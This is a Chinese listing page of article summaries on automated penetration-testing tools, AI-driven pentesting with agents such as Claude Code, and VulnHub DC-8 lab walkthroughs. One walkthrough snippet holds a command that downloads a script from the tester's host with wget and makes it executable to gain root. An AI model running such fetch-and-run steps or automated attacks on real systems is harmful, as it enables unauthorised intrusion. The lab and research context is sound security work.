- 综合排序
- 最热优先
- 最新优先
- 来自专栏信安之路
内网域自动化渗透
有没有种再看黑客大片种自动化攻击目标的感觉?手机预览了一下这个视频,一点都不清晰,大家先看看 ppt 在看到 demo 演示的部分,有兴趣可以点击阅读原文看视频吧。具体其中有哪些技术呢? https://asciinema.org/a/45ry3g26devqcabpugwyz4to5 项目地址如下: https://github.com/milo2012/portia/ 对于内网渗透 ,像这种自动化的工具要慎用,因为这些是你所不能控制的,容易被内网的安全防御设备所捕获,已经被发现了,你还不知道,所以我建议大家在做内网渗透的时候要一步一步手工操作,这样在你的可控范围之内的。 所以大家在作渗透的时候不要在意使用什么样的工具,知道原理之后,任何工具能做的手工都可以搞定,所以我们的公众号坚持分享技术原理的初心就是这么来的。
75800发布于 2018-08-08 - 来自专栏靶机渗透
靶机渗透DC-8
用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。
56620发布于 2020-04-21 - 来自专栏网络安全自修室
DC-8靶机渗透实战
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 渗透实战 ? ? 再来看看下面: Home: ?nid=1 传参了 而刚才上面的没有任何参数 ? ? ? 参考资料 [1] 下载地址: http://www.five86.com/dc-8.html [2] 参考文章1: https://blog.csdn.net/weixin_43762939/article
1.1K20发布于 2020-08-11 - 来自专栏Khan安全团队
云渗透安全 - Nebula 自动化测试
Nebula 是一个云和(希望如此)DevOps 渗透测试框架。它为每个提供者和每个功能构建了模块。 2021 年 4 月,它仅涵盖 AWS,但目前是一个正在进行的项目,并有望继续发展以测试 GCP、Azure、Kubernetes、Docker 或 Ansible、Terraform、Chef 等自动化引擎
1.8K30发布于 2021-07-08 - 来自专栏HACK学习
TrackRay-渗透测试自动化框架
“如果我有8小时的时间砍一棵树,我就会花费6小时磨利自己的斧子。” —亚伯拉罕·林肯 溯光,英文名“TrackRay”,意为逆光而行,追溯光源。同时致敬安全圈前辈开发的“溯雪”,“流光”。 溯光是一个开源的插件化渗透测试框架,框架自身实现了漏洞扫描功能,集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS等。 文档 安装说明 https://github.com/iSafeBlue/TrackRay/blob/master/docs/%E5%AE%89%E8%A3%85%E8%AF%B4%E6%98%8E.md 插件开发 https://github.com/iSafeBlue/TrackRay/blob/master/docs/%E6%89%A9%E5%B1%95%E5%BC%80%E5%8F%91.md 致谢名单 赞助 您的捐助将被用于 持续开发溯光渗透测试框架 trackray.cn 域名续费 社区活动 奖励杰出贡献者 申明 溯光遵循 GPL 开源协议,请务必了解。
1.3K10发布于 2019-08-06 - 来自专栏好靶场
OpenClaw自动化渗透测试初试牛刀
id=106开始测试:首先开启靶场,然后输入一下提示词:展开代码语言:TXTAI代码解释帮我针对这个网站进行渗透测试,只需要关注漏洞即可,不使用任何的mcp能力,http://ybpy1r0.haobachang2
1.1K40编辑于 2026-03-10 - 来自专栏绿盟科技研究通讯
【自动化渗透】DeepExploit框架深度分析
自动化渗透测试,顾名思义,即自动化完成渗透测试的过程。 自动化工具能发现多少风险点;2. 自动化工具对渗透测试的效率提升有多大。这两个问题的解决程度决定了自动化工具的优劣。 在渗透测试的过程中,“漏洞探测”往往是最耗时的一步。 理论上讲,为了提升渗透效率,那么自动化渗透的核心价值应体现于现实中最耗时耗力的部分(漏洞探测)上,将上述长期的人工渗透过程进行自动化。 但是就目前来讲,大部分自动化渗透产品的做法是简单地将漏扫的结果与相关的利用工具相结合,从而达到自动化渗透的效果,而“人工渗透的过程”并未有效实现自动化。 自动化渗透工具能多大程度解决上述问题呢? old_sebug_paper/other/metasploit_users_guide_chinese.pdf [4]https://zh.wikipedia.org/wiki/%E5%BC%BA%E5%8C
3.3K10编辑于 2022-03-11 - 来自专栏网络安全攻防
K8s污点横向渗透
文章前言 污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的
69400编辑于 2024-05-27 - 来自专栏网络安全攻防
K8s污点横向渗透
文章前言 污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的
26300编辑于 2025-03-10 - 来自专栏中国白客联盟
利用Claude Skills完成AI自动化渗透
大致逻辑如下: 用户请求 → Claude Code 理解意图 → 自动选择合适的 Skill → 调用对应的 Tool → 返回结果 那么在自动化渗透中,Skills可以帮忙完成什么呢? 得益于之前的调研结果,笔者发现通过预定义各种Tools和对应的参数在自动化渗透中意义并不大,因为渗透本身就会遇到各种漏洞,预定义各种Tools无法满足各种渗透条件,也无法解决当出现被WAF拦截时的自定义变异 这里需要注意的点: **不要使用弱智的LLM,否则会出现:调用慢、不会更新todolist、不会自我往下执行而需要用户每次确认** 总结 本文介绍了`Claude Code` + `Skills`在AI自动化渗透这块的实现
76510编辑于 2026-03-31 - 来自专栏FreeBuf
DeathStar:一键自动化域渗透工具
Empire和BloodHound这两个Github项目极大程度地简化了针对活动目录(AD)的渗透测试过程,至少在我当前所遇到的95%的环境中是这样的。 随着年月的积累,我发现很多事情都是自己一直在重复地做着,因此我打算将它们通过自动化的方式来实现。 但在我开始之前我还想提醒一下各位,拿到域管理员权限并不是你渗透测试的唯一目标,如果你是这样想的话,那你就大错特错了。 DeathStar的运行机制 下面这张图片可以很好地解释DeathStar的运行机制: 如果你曾经对活动目录进行过渗透测试的话,那么你应该对这张图片不会感到陌生。 视频地址1:https://youtu.be/PTpg_9IgxB0 视频地址2:https://youtu.be/1ZCkC8FXSzs 需要注意的是,这两个视频采取了不同的方法来利用凭证,但我们还可以使用本地管理员权限和
1.4K70发布于 2018-02-26 - 来自专栏JDArmy
自动化内网渗透路径决策——睡前小论文
自动化内网渗透路径决策 1、阅读原因 自动化的最终目的是做一个全自动化的渗透工具,本文是学术界2018年发布的一篇论文,主要就是讲如何通过强化学习来进行自动化路径决策。对后续工具的开发具有借鉴意义。 所以作者提出了自动化的解决方案。 (2)解决方案 1.采集当前网络信息状态,包括已知漏洞、网络服务、网络访问规则。 2.通过MulVAL来获取网络中所有可能存在的攻击路径。
51620编辑于 2023-08-29 - 来自专栏FreeBuf
如何使用Lucifer实现自动化渗透测试任务
关于Lucifer Lucifer是一款功能强大的渗透测试工具,可以帮助广大研究人员实现各种自动化渗透测试任务,比如说本地权限提升、文件/数据枚举以及数据提取等操作。 毫无疑问,Lucifer所提供的各种自动化模块可以很大程度地提升安全研究人员的工作效率。
74640发布于 2021-07-03 - 来自专栏网络安全自修室
每周打靶 | Vulnhub-DC8靶机渗透实战
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! unix x2nhb wget 192.168.0.103/666.sh chmod 777 666.sh ls -l 87oty 拿到root权限,直接打开flag.txt 至此看到了flag,渗透测试结束
61930编辑于 2023-09-02 - 来自专栏vulnhub DC 1-9
VulnHub DC-8 靶机渗透测试笔记
VulnHub DC-8 靶机渗透测试笔记靶机信息靶机名称:DC-8靶机来源:VulnHub目标:获取 root 权限,找到最终 flag难度:⭐⭐⭐⭐☆(中等偏难)涉及技术:信息收集、SQL注入、hashcat 最终取得 flag:六、渗透流程总结信息收集(nmap + dirsearch) ↓发现 nid 参数 → 单引号测试报错 → 确认 SQL 注入 ↓sqlmap 跑库 → 拿到哈希 → hashcat nmap 端口扫描、服务识别 dirsearch Web 目录扫描(-x 过滤无效状态码)sqlmap 自动化 searchsploit 本地漏洞库搜索 python3 http.server临时 HTTP 文件传输 本文为 VulnHub DC-8
23610编辑于 2026-03-08 - 来自专栏渗透测试专栏
渗透测试信息收集技巧(8)——Cobalt Strike配置
Cobalt Strike Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作。 本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
82220编辑于 2024-09-26 - 来自专栏全栈程序员必看
自动化渗透测试系统_自动化测试用例管理工具
面向专业的渗透测试和安全审计。 四.信息搜集自动化工具 1.DNS信息搜集 GOBUSTER 这款工具基于Go编程语言开发,广大研究人员可使用该工具来对目录、文件、DNS和VHost等对象进行暴力激活成功教程攻击。 五.WEB漏洞发现自动化工具 1.半自动web漏洞扫描工具——Burp Suite Burp Suite -一款功能强大的渗透测试工具,此软件能够用来分析那些不可预知的应用程序,包括会话令牌和主要数据项的随机性 shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MjUxNDY2OA==,size_16,color_FFFFFF,t_70) 六.系统漏洞发现自动化工具 4.Cobaltstrike CobaltStrike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等
2.3K10编辑于 2022-09-22 - 来自专栏测试游记
Java自动化测试(Maven 8)
xml version="1.0" encoding="UTF-8"? -- 文件拷贝时的编码 --> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <project.reporting.outputEncoding >UTF-8</project.reporting.outputEncoding> <! -- 编译时的编码 --> <maven.compiler.encoding>UTF-8</maven.compiler.encoding> <aspectj.version>1.9.2
1.1K10发布于 2020-07-20 - 来自专栏测试开发社区
自动化移动安全渗透测试框架:Mobile Security Framework
Mobile Security Framework (移动安全框架) 是一款智能、一体化的开源移动应用(Android/iOS)自动渗透测试框架,它能进行静态、动态的分析。 现在大家使用的是多种不同工具进行反编译、解码、调试、代码审查、渗透测试,这会花费大量的时间和精力。 功能介绍 静态分析器可以执行自动化的代码审计、检测不安全的权限请求和设置,还可以检测不安全的代码,诸如ssl绕过、弱加密、混淆代码、硬编码的密码、危险API的不当使用、敏感信息/个人验证信息泄露、不安全的文件存储等
1.9K31发布于 2019-09-20 - 来自专栏网络安全攻防
【神兵利器】微信小程序辅助渗透-自动化
项目介绍 在对微信小程序进行渗透测试时本项目可以提供自动渗透辅助,其中自动化辅助反编译、自动化注入Hook、自动化查看信息泄露等,目前仅限于Windows操作系统 效果演示 项目使用效果演示如下: config.yaml
71100编辑于 2025-04-04
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号